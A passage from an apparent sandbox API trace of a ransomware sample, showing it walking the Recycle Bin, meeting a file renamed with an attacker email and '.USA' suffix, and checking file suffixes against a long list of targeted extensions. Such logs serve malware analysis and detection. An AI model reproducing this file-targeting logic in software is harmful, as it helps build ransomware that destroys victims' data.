ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x62a648 [0034.626] FindNextFileW (in: hFindFile=0x62a648, lpFindFileData=0x3aafa84 | out: lpFindFileData=0x3aafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.626] FindNextFileW (in: hFindFile=0x62a648, lpFindFileData=0x3aafa84 | out: lpFindFileData=0x3aafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x12827b30, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x12827b30, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0034.626] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0034.626] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0034.626] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0034.626] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0034.626] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f11060 [0034.627] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0034.627] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3aaf808 | out: lpFindFileData=0x3aaf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x12827b30, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x1284dc90, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x62a688 [0034.627] FindNextFileW (in: hFindFile=0x62a688, lpFindFileData=0x3aaf808 | out: lpFindFileData=0x3aaf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x12827b30, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x1284dc90, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.627] FindNextFileW (in: hFindFile=0x62a688, lpFindFileData=0x3aaf808 | out: lpFindFileData=0x3aaf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x12827b30, ftCreationTime.dwHighDateTime=0x1d53e5f, ftLastAccessTime.dwLowDateTime=0x12827b30, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x1284dc90, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA", cAlternateFileName="DESKTO~1.USA")) returned 1 [0034.627] lstrlenW (lpString="desktop.ini.id-9C354B42.[mr.hacker@tutanota.com].USA") returned 52 [0034.627] lstrlenW (lpString=".1cd") returned 4 [0034.627] lstrcmpiW (lpString1=".1cd", lpString2=".USA") returned -1 [0034.627] lstrlenW (lpString=".3ds") returned 4 [0034.627] lstrcmpiW (lpString1=".3ds", lpString2=".USA") returned -1 [0034.627] lstrlenW (lpString=".3fr") returned 4 [0034.627] lstrcmpiW (lpString1=".3fr", lpString2=".USA") returned -1 [0034.627] lstrlenW (lpString=".3g2") returned 4 [0034.627] lstrcmpiW (lpString1=".3g2", lpString2=".USA") returned -1 [0034.627] lstrlenW (lpString=".3gp") returned 4 [0034.627] lstrcmpiW (lpString1=".3gp", lpString2=".USA") returned -1 [0034.627] lstrlenW (lpString=".7z") returned 3 [0034.627] lstrcmpiW (lpString1=".7z", lpString2="USA") returned -1 [0034.627] lstrlenW (lpString=".accda") returned 6 [0034.627] lstrcmpiW (lpString1=".accda", lpString2="m].USA") returned -1 [0034.627] lstrlenW (lpString=".accdb") returned 6 [0034.627] lstrcmpiW (lpString1=".accdb", lpString2="m].USA") returned -1 [0034.628] lstrlenW (lpString=".accdc") returned 6 [0034.628] lstrcmpiW (lpString1=".accdc", lpString2="m].USA") returned -1 [0034.628] lstrlenW (lpString=".accde") returned 6 [0034.628] lstrcmpiW (lpString1=".accde", lpString2="m].USA") returned -1 [0034.628] lstrlenW (lpString=".accdt") returned 6 [0034.628] lstrcmpiW (lpString1=".accdt", lpString2="m].USA") returned -1 [0034.628] lstrlenW (lpString=".accdw") returned 6 [0034.628] lstrcmpiW (lpString1=".accdw", lpString2="m].USA") returned -1 [0034.628] lstrlenW (lpString=".adb") returned 4 [0034.628] lstrcmpiW (lpString1=".adb", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".adp") returned 4 [0034.628] lstrcmpiW (lpString1=".adp", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".ai") returned 3 [0034.628] lstrcmpiW (lpString1=".ai", lpString2="USA") returned -1 [0034.628] lstrlenW (lpString=".ai3") returned 4 [0034.628] lstrcmpiW (lpString1=".ai3", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".ai4") returned 4 [0034.628] lstrcmpiW (lpString1=".ai4", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".ai5") returned 4 [0034.628] lstrcmpiW (lpString1=".ai5", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".ai6") returned 4 [0034.628] lstrcmpiW (lpString1=".ai6", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".ai7") returned 4 [0034.628] lstrcmpiW (lpString1=".ai7", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".ai8") returned 4 [0034.628] lstrcmpiW (lpString1=".ai8", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".anim") returned 5 [0034.628] lstrcmpiW (lpString1=".anim", lpString2="].USA") returned -1 [0034.628] lstrlenW (lpString=".arw") returned 4 [0034.628] lstrcmpiW (lpString1=".arw", lpString2=".USA") returned -1 [0034.628] lstrlenW (lpString=".as") returned 3 [0034.628] lstrcmpiW (lpString1=".as", lpString2="USA") returned -1 [0034.628] lstrlenW (lpString=".asa") returned 4 [0034.628] lstrcmpiW (lpString1=".asa", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".asc") returned 4 [0034.629] lstrcmpiW (lpString1=".asc", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".ascx") returned 5 [0034.629] lstrcmpiW (lpString1=".ascx", lpString2="].USA") returned -1 [0034.629] lstrlenW (lpString=".asm") returned 4 [0034.629] lstrcmpiW (lpString1=".asm", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".asmx") returned 5 [0034.629] lstrcmpiW (lpString1=".asmx", lpString2="].USA") returned -1 [0034.629] lstrlenW (lpString=".asp") returned 4 [0034.629] lstrcmpiW (lpString1=".asp", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".aspx") returned 5 [0034.629] lstrcmpiW (lpString1=".aspx", lpString2="].USA") returned -1 [0034.629] lstrlenW (lpString=".asr") returned 4 [0034.629] lstrcmpiW (lpString1=".asr", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".asx") returned 4 [0034.629] lstrcmpiW (lpString1=".asx", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".avi") returned 4 [0034.629] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".avs") returned 4 [0034.629] lstrcmpiW (lpString1=".avs", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".backup") returned 7 [0034.629] lstrcmpiW (lpString1=".backup", lpString2="om].USA") returned -1 [0034.629] lstrlenW (lpString=".bak") returned 4 [0034.629] lstrcmpiW (lpString1=".bak", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".bay") returned 4 [0034.629] lstrcmpiW (lpString1=".bay", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".bd") returned 3 [0034.629] lstrcmpiW (lpString1=".bd", lpString2="USA") returned -1 [0034.629] lstrlenW (lpString=".bin") returned 4 [0034.629] lstrcmpiW (lpString1=".bin", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".bmp") returned 4 [0034.629] lstrcmpiW (lpString1=".bmp", lpString2=".USA") returned -1 [0034.629] lstrlenW (lpString=".bz2") returned 4 [0034.630] lstrcmpiW (lpString1=".bz2", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".c") returned 2 [0034.630] lstrcmpiW (lpString1=".c", lpString2="SA") returned -1 [0034.630] lstrlenW (lpString=".cdr") returned 4 [0034.630] lstrcmpiW (lpString1=".cdr", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".cer") returned 4 [0034.630] lstrcmpiW (lpString1=".cer", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".cf") returned 3 [0034.630] lstrcmpiW (lpString1=".cf", lpString2="USA") returned -1 [0034.630] lstrlenW (lpString=".cfc") returned 4 [0034.630] lstrcmpiW (lpString1=".cfc", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".cfm") returned 4 [0034.630] lstrcmpiW (lpString1=".cfm", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".cfml") returned 5 [0034.630] lstrcmpiW (lpString1=".cfml", lpString2="].USA") returned -1 [0034.630] lstrlenW (lpString=".cfu") returned 4 [0034.630] lstrcmpiW (lpString1=".cfu", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".chm") returned 4 [0034.630] lstrcmpiW (lpString1=".chm", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".cin") returned 4 [0034.630] lstrcmpiW (lpString1=".cin", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".class") returned 6 [0034.630] lstrcmpiW (lpString1=".class", lpString2="m].USA") returned -1 [0034.630] lstrlenW (lpString=".clx") returned 4 [0034.630] lstrcmpiW (lpString1=".clx", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".config") returned 7 [0034.630] lstrcmpiW (lpString1=".config", lpString2="om].USA") returned -1 [0034.630] lstrlenW (lpString=".cpp") returned 4 [0034.630] lstrcmpiW (lpString1=".cpp", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".cr2") returned 4 [0034.630] lstrcmpiW (lpString1=".cr2", lpString2=".USA") returned -1 [0034.630] lstrlenW (lpString=".crt") returned 4 [0034.630] lstrcmpiW (lpString1=".crt", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".crw") returned 4 [0034.631] lstrcmpiW (lpString1=".crw", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".cs") returned 3 [0034.631] lstrcmpiW (lpString1=".cs", lpString2="USA") returned -1 [0034.631] lstrlenW (lpString=".css") returned 4 [0034.631] lstrcmpiW (lpString1=".css", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".csv") returned 4 [0034.631] lstrcmpiW (lpString1=".csv", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".cub") returned 4 [0034.631] lstrcmpiW (lpString1=".cub", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".dae") returned 4 [0034.631] lstrcmpiW (lpString1=".dae", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".dat") returned 4 [0034.631] lstrcmpiW (lpString1=".dat", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".db") returned 3 [0034.631] lstrcmpiW (lpString1=".db", lpString2="USA") returned -1 [0034.631] lstrlenW (lpString=".dbf") returned 4 [0034.631] lstrcmpiW (lpString1=".dbf", lpString2=".USA") returned -1 [0034.631] lstrlenW (lpString=".dbx") returned 4 [0034.632] lstrcmpiW (lpString1=".dbx", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dc3") returned 4 [0034.632] lstrcmpiW (lpString1=".dc3", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dcm") returned 4 [0034.632] lstrcmpiW (lpString1=".dcm", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dcr") returned 4 [0034.632] lstrcmpiW (lpString1=".dcr", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".der") returned 4 [0034.632] lstrcmpiW (lpString1=".der", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dib") returned 4 [0034.632] lstrcmpiW (lpString1=".dib", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dic") returned 4 [0034.632] lstrcmpiW (lpString1=".dic", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dif") returned 4 [0034.632] lstrcmpiW (lpString1=".dif", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".divx") returned 5 [0034.632] lstrcmpiW (lpString1=".divx", lpString2="].USA") returned -1 [0034.632] lstrlenW (lpString=".djvu") returned 5 [0034.632] lstrcmpiW (lpString1=".djvu", lpString2="].USA") returned -1 [0034.632] lstrlenW (lpString=".dng") returned 4 [0034.632] lstrcmpiW (lpString1=".dng", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".doc") returned 4 [0034.632] lstrcmpiW (lpString1=".doc", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".docm") returned 5 [0034.632] lstrcmpiW (lpString1=".docm", lpString2="].USA") returned -1 [0034.632] lstrlenW (lpString=".docx") returned 5 [0034.632] lstrcmpiW (lpString1=".docx", lpString2="].USA") returned -1 [0034.632] lstrlenW (lpString=".dot") returned 4 [0034.632] lstrcmpiW (lpString1=".dot", lpString2=".USA") returned -1 [0034.632] lstrlenW (lpString=".dotm") returned 5 [0034.632] lstrcmpiW (lpString1=".dotm", lpString2="].USA") returned -1 [0034.632] lstrlenW (lpString=".dotx") returned 5 [0034.632] lstrcmpiW (lpString1=".dotx", lpString2="].USA") returned -1 [0034.632] lstrlenW (lpString=".dpx") returned 4 [0034.633] lstrcmpiW (lpString1=".dpx", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".dqy") returned 4 [0034.633] lstrcmpiW (lpString1=".dqy", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".dsn") returned 4 [0034.633] lstrcmpiW (lpString1=".dsn", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".dt") returned 3 [0034.633] lstrcmpiW (lpString1=".dt", lpString2="USA") returned -1 [0034.633] lstrlenW (lpString=".dtd") returned 4 [0034.633] lstrcmpiW (lpString1=".dtd", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".dwg") returned 4 [0034.633] lstrcmpiW (lpString1=".dwg", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".dwt") returned 4 [0034.633] lstrcmpiW (lpString1=".dwt", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".dx") returned 3 [0034.633] lstrcmpiW (lpString1=".dx", lpString2="USA") returned -1 [0034.633] lstrlenW (lpString=".dxf") returned 4 [0034.633] lstrcmpiW (lpString1=".dxf", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".edml") returned 5 [0034.633] lstrcmpiW (lpString1=".edml", lpString2="].USA") returned -1 [0034.633] lstrlenW (lpString=".efd") returned 4 [0034.633] lstrcmpiW (lpString1=".efd", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".elf") returned 4 [0034.633] lstrcmpiW (lpString1=".elf", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".emf") returned 4 [0034.633] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".emz") returned 4 [0034.633] lstrcmpiW (lpString1=".emz", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".epf") returned 4 [0034.633] lstrcmpiW (lpString1=".epf", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".eps") returned 4 [0034.633] lstrcmpiW (lpString1=".eps", lpString2=".USA") returned -1 [0034.633] lstrlenW (lpString=".epsf") returned 5 [0034.633] lstrcmpiW (lpString1=".epsf", lpString2="].USA") returned -1 [0034.633] lstrlenW (lpString=".epsp") returned 5 [0034.634] lstrcmpiW (lpString1=".epsp", lpString2="].USA") returned -1 [0034.634] lstrlenW (lpString=".erf") returned 4 [0034.634] lstrcmpiW (lpString1=".erf", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".exr") returned 4 [0034.634] lstrcmpiW (lpString1=".exr", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".f4v") returned 4 [0034.634] lstrcmpiW (lpString1=".f4v", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".fido") returned 5 [0034.634] lstrcmpiW (lpString1=".fido", lpString2="].USA") returned -1 [0034.634] lstrlenW (lpString=".flm") returned 4 [0034.634] lstrcmpiW (lpString1=".flm", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".flv") returned 4 [0034.634] lstrcmpiW (lpString1=".flv", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".frm") returned 4 [0034.634] lstrcmpiW (lpString1=".frm", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".fxg") returned 4 [0034.634] lstrcmpiW (lpString1=".fxg", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".geo") returned 4 [0034.634] lstrcmpiW (lpString1=".geo", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".gif") returned 4 [0034.634] lstrcmpiW (lpString1=".gif", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".grs") returned 4 [0034.634] lstrcmpiW (lpString1=".grs", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".gz") returned 3 [0034.634] lstrcmpiW (lpString1=".gz", lpString2="USA") returned -1 [0034.634] lstrlenW (lpString=".h") returned 2 [0034.634] lstrcmpiW (lpString1=".h", lpString2="SA") returned -1 [0034.634] lstrlenW (lpString=".hdr") returned 4 [0034.634] lstrcmpiW (lpString1=".hdr", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".hpp") returned 4 [0034.634] lstrcmpiW (lpString1=".hpp", lpString2=".USA") returned -1 [0034.634] lstrlenW (lpString=".hta") returned 4 [0034.634] lstrcmpiW (lpString1=".hta", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".htc") returned 4 [0034.635] lstrcmpiW (lpString1=".htc", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".htm") returned 4 [0034.635] lstrcmpiW (lpString1=".htm", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".html") returned 5 [0034.635] lstrcmpiW (lpString1=".html", lpString2="].USA") returned -1 [0034.635] lstrlenW (lpString=".icb") returned 4 [0034.635] lstrcmpiW (lpString1=".icb", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".ics") returned 4 [0034.635] lstrcmpiW (lpString1=".ics", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".iff") returned 4 [0034.635] lstrcmpiW (lpString1=".iff", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".inc") returned 4 [0034.635] lstrcmpiW (lpString1=".inc", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".indd") returned 5 [0034.635] lstrcmpiW (lpString1=".indd", lpString2="].USA") returned -1 [0034.635] lstrlenW (lpString=".ini") returned 4 [0034.635] lstrcmpiW (lpString1=".ini", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".iqy") returned 4 [0034.635] lstrcmpiW (lpString1=".iqy", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".j2c") returned 4 [0034.635] lstrcmpiW (lpString1=".j2c", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".j2k") returned 4 [0034.635] lstrcmpiW (lpString1=".j2k", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".java") returned 5 [0034.635] lstrcmpiW (lpString1=".java", lpString2="].USA") returned -1 [0034.635] lstrlenW (lpString=".jp2") returned 4 [0034.635] lstrcmpiW (lpString1=".jp2", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".jpc") returned 4 [0034.635] lstrcmpiW (lpString1=".jpc", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".jpe") returned 4 [0034.635] lstrcmpiW (lpString1=".jpe", lpString2=".USA") returned -1 [0034.635] lstrlenW (lpString=".jpeg") returned 5 [0034.635] lstrcmpiW (lpString1=".jpeg", lpString2="].USA") returned -1 [0034.636] lstrlenW (lpString=".jpf") returned 4 [0034.636] lstrcmpiW (lpString1=".jpf", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".jpg") returned 4 [0034.636] lstrcmpiW (lpString1=".jpg", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".jpx") returned 4 [0034.636] lstrcmpiW (lpString1=".jpx", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".js") returned 3 [0034.636] lstrcmpiW (lpString1=".js", lpString2="USA") returned -1 [0034.636] lstrlenW (lpString=".jsf") returned 4 [0034.636] lstrcmpiW (lpString1=".jsf", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".json") returned 5 [0034.636] lstrcmpiW (lpString1=".json", lpString2="].USA") returned -1 [0034.636] lstrlenW (lpString=".jsp") returned 4 [0034.636] lstrcmpiW (lpString1=".jsp", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".kdc") returned 4 [0034.636] lstrcmpiW (lpString1=".kdc", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".kmz") returned 4 [0034.636] lstrcmpiW (lpString1=".kmz", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".kwm") returned 4 [0034.636] lstrcmpiW (lpString1=".kwm", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".lasso") returned 6 [0034.636] lstrcmpiW (lpString1=".lasso", lpString2="m].USA") returned -1 [0034.636] lstrlenW (lpString=".lbi") returned 4 [0034.636] lstrcmpiW (lpString1=".lbi", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".lgf") returned 4 [0034.636] lstrcmpiW (lpString1=".lgf", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".lgp") returned 4 [0034.636] lstrcmpiW (lpString1=".lgp", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".log") returned 4 [0034.636] lstrcmpiW (lpString1=".log", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".m1v") returned 4 [0034.636] lstrcmpiW (lpString1=".m1v", lpString2=".USA") returned -1 [0034.636] lstrlenW (lpString=".m4a") returned 4 [0034.636] lstrcmpiW (lpString1=".m4a", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".m4v") returned 4 [0034.637] lstrcmpiW (lpString1=".m4v", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".max") returned 4 [0034.637] lstrcmpiW (lpString1=".max", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".md") returned 3 [0034.637] lstrcmpiW (lpString1=".md", lpString2="USA") returned -1 [0034.637] lstrlenW (lpString=".mda") returned 4 [0034.637] lstrcmpiW (lpString1=".mda", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mdb") returned 4 [0034.637] lstrcmpiW (lpString1=".mdb", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mde") returned 4 [0034.637] lstrcmpiW (lpString1=".mde", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mdf") returned 4 [0034.637] lstrcmpiW (lpString1=".mdf", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mdw") returned 4 [0034.637] lstrcmpiW (lpString1=".mdw", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mef") returned 4 [0034.637] lstrcmpiW (lpString1=".mef", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mft") returned 4 [0034.637] lstrcmpiW (lpString1=".mft", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mfw") returned 4 [0034.637] lstrcmpiW (lpString1=".mfw", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mht") returned 4 [0034.637] lstrcmpiW (lpString1=".mht", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mhtml") returned 6 [0034.637] lstrcmpiW (lpString1=".mhtml", lpString2="m].USA") returned -1 [0034.637] lstrlenW (lpString=".mka") returned 4 [0034.637] lstrcmpiW (lpString1=".mka", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mkidx") returned 6 [0034.637] lstrcmpiW (lpString1=".mkidx", lpString2="m].USA") returned -1 [0034.637] lstrlenW (lpString=".mkv") returned 4 [0034.637] lstrcmpiW (lpString1=".mkv", lpString2=".USA") returned -1 [0034.637] lstrlenW (lpString=".mos") returned 4 [0034.638] lstrcmpiW (lpString1=".mos", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mov") returned 4 [0034.638] lstrcmpiW (lpString1=".mov", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mp3") returned 4 [0034.638] lstrcmpiW (lpString1=".mp3", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mp4") returned 4 [0034.638] lstrcmpiW (lpString1=".mp4", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mpeg") returned 5 [0034.638] lstrcmpiW (lpString1=".mpeg", lpString2="].USA") returned -1 [0034.638] lstrlenW (lpString=".mpg") returned 4 [0034.638] lstrcmpiW (lpString1=".mpg", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mpv") returned 4 [0034.638] lstrcmpiW (lpString1=".mpv", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mrw") returned 4 [0034.638] lstrcmpiW (lpString1=".mrw", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".msg") returned 4 [0034.638] lstrcmpiW (lpString1=".msg", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".mxl") returned 4 [0034.638] lstrcmpiW (lpString1=".mxl", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".myd") returned 4 [0034.638] lstrcmpiW (lpString1=".myd", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".myi") returned 4 [0034.638] lstrcmpiW (lpString1=".myi", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".nef") returned 4 [0034.638] lstrcmpiW (lpString1=".nef", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".nrw") returned 4 [0034.638] lstrcmpiW (lpString1=".nrw", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".obj") returned 4 [0034.638] lstrcmpiW (lpString1=".obj", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".odb") returned 4 [0034.638] lstrcmpiW (lpString1=".odb", lpString2=".USA") returned -1 [0034.638] lstrlenW (lpString=".odc") returned 4 [0034.638] lstrcmpiW (lpString1=".odc", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".odm") returned 4 [0034.639] lstrcmpiW (lpString1=".odm", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".odp") returned 4 [0034.639] lstrcmpiW (lpString1=".odp", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".ods") returned 4 [0034.639] lstrcmpiW (lpString1=".ods", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".oft") returned 4 [0034.639] lstrcmpiW (lpString1=".oft", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".one") returned 4 [0034.639] lstrcmpiW (lpString1=".one", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".onepkg") returned 7 [0034.639] lstrcmpiW (lpString1=".onepkg", lpString2="om].USA") returned -1 [0034.639] lstrlenW (lpString=".onetoc2") returned 8 [0034.639] lstrcmpiW (lpString1=".onetoc2", lpString2="com].USA") returned -1 [0034.639] lstrlenW (lpString=".opt") returned 4 [0034.639] lstrcmpiW (lpString1=".opt", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".oqy") returned 4 [0034.639] lstrcmpiW (lpString1=".oqy", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".orf") returned 4 [0034.639] lstrcmpiW (lpString1=".orf", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".p12") returned 4 [0034.639] lstrcmpiW (lpString1=".p12", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".p7b") returned 4 [0034.639] lstrcmpiW (lpString1=".p7b", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".p7c") returned 